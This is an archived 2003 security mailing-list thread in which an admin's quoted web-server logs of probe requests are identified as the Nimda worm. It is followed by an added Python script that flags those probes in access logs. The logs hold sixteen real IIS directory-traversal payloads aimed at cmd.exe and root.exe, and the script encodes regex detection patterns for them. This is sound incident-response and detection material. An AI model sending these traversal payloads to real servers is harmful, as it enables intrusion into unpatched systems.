Re: Anyone know this tool?

From: Danny (danny_at_eboundary.com)
Date: 07/29/03

  • Next message: Jason Falciola: "Re: Anyone know this tool?"
    Date: Tue, 29 Jul 2003 13:10:02 -0400
    To: Jason Falciola <falciola@us.ibm.com>
    hrm ok, I'm going to crawl back into my hole now :)

    I'm kind of confused as to why I haven't seen any of these patterns
    before the last 2 days though. Oh well.

    Thanks guys.

    On Tuesday, July 29, 2003, at 12:57 PM, Jason Falciola wrote:

    > Looks like plain old Nimda to me. Someone please correct me if I'm
    > missing something obvious.
    >
    > <http://www.cert.org/advisories/CA-2001-26.html>
    >
    > Jason Falciola
    > Security Intelligence Analyst
    > IBM Managed Security Services
    > falciola@us.ibm.com
    >
    > Danny <danny@eboundary.com>
    > 07/28/2003 11:24 PM
    >
    > To: incidents@securityfocus.com
    > cc:
    > Subject: Anyone know this tool?
    >
    > Does anyone happen to know what tool this is? I've seen the exact same
    > scans on 6 of our servers on completely different networks. All the
    > scans have been from different source IPs and all the servers were hit
    > within a space of a few hours.
    >
    > Curiosity is getting the better of me since I've never seen this exact
    > pattern before :)
    >
    > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >
    > Danny
    > Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    > Play - http://www.eBoundary.net - Who really sets your electronic
    > boundaries?
    > AIM: eBoundaryTch | ICQ: 3090141
    Danny
    Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    Play - http://www.eBoundary.net - Who really sets your electronic
    boundaries?
    AIM: eBoundaryTch | ICQ: 3090141

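The request strings quoted above are the probe set that CA-2001-26 describes for Nimda: the root.exe backdoor and the /c and /d share mappings left behind by Code Red II, followed by the IIS double-decode and overlong-UTF-8 traversal variants. Below is an added example for this thread, not code from the post, the list, or CERT: a small Apache access-log triage script that tags each line with the probe family it matches and rolls the hits up per source address. The signature labels, the summary fields, and the nimda_like heuristic (all four families from one address in one burst) are this example's own choices. The sample input is five of the lines quoted in the post plus one constructed benign request from 192.0.2.10, a documentation address.

```python
"""Flag Nimda-style IIS probe sequences in Apache access-log lines.

Added example for this thread, not code from the post or from CERT CA-2001-26.
The signature labels and the summary format are this example's own choices.
"""
import re
from collections import defaultdict

# Apache common/combined log format: ip ident user [timestamp] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" (?P<status>\d{3}) '
)

# Probe families present in the post's log lines: the Code Red II root.exe backdoor
# and /c, /d share mappings, then the IIS double-decode and overlong-UTF-8
# traversal bugs that Nimda walks through (CA-2001-26).
SIGNATURES = [
    ("root.exe backdoor", re.compile(r'/root\.exe', re.I)),
    ("cmd.exe via /c or /d share", re.compile(r'^/[cd]/winnt/system32/cmd\.exe', re.I)),
    ("double-encoded traversal",
     re.compile(r'\.\.(?:%25(?:5c|2f)|%%35(?:c|%63)|%25%35%63)', re.I)),
    ("overlong-utf8 traversal", re.compile(r'\.\.(?:%c0%(?:af|2f)|%c1%(?:1c|9c))', re.I)),
]


def classify(line):
    """Parse one log line; return its fields plus the matching probe families, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    tags = [label for label, rx in SIGNATURES if rx.search(path)]
    status = m.group("status")
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": path,
        "status": int(status),
        "tags": tags,
        # A non-IIS host (FreeBSD/Apache in the post) can only answer 400/404. A 2xx on
        # a cmd.exe or root.exe request means the command actually ran: escalate it.
        "succeeded": bool(tags) and status.startswith("2"),
    }


def summarize(lines):
    """Per source IP: probe count, distinct families, timing, and whether any probe got a 2xx."""
    per_ip = defaultdict(lambda: {"probes": 0, "families": set(), "succeeded": False,
                                  "first": None, "last": None})
    for line in lines:
        rec = classify(line)
        if rec is None or not rec["tags"]:
            continue
        s = per_ip[rec["ip"]]
        s["probes"] += 1
        s["families"].update(rec["tags"])
        s["succeeded"] = s["succeeded"] or rec["succeeded"]
        s["first"] = s["first"] or rec["ts"]
        s["last"] = rec["ts"]
    # Heuristic of this example: all four families from one address in one burst is
    # the full Nimda probe walk, not a one-off request reusing a single string.
    return {ip: {**s, "families": sorted(s["families"]),
                 "nimda_like": len(s["families"]) == len(SIGNATURES)}
            for ip, s in per_ip.items()}


# Sample input: five request lines copied from the post plus one constructed benign
# request from 192.0.2.10 (RFC 5737 documentation address, not a real client).
SAMPLE_LOG = [
    '64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"',
    '192.0.2.10 - - [28/Jul/2003:22:20:05 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(ip, s)
```

The 400 on the `%%35%63` and `%%35c` lines is worth keeping in the rule set rather than filtering out: Apache rejects the malformed percent-escape before routing, so a grep on 404 alone misses two of the sixteen probes. The only result that should page anyone is `succeeded` turning true; everything else from this burst is background noise from an infected host two years after the advisory.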

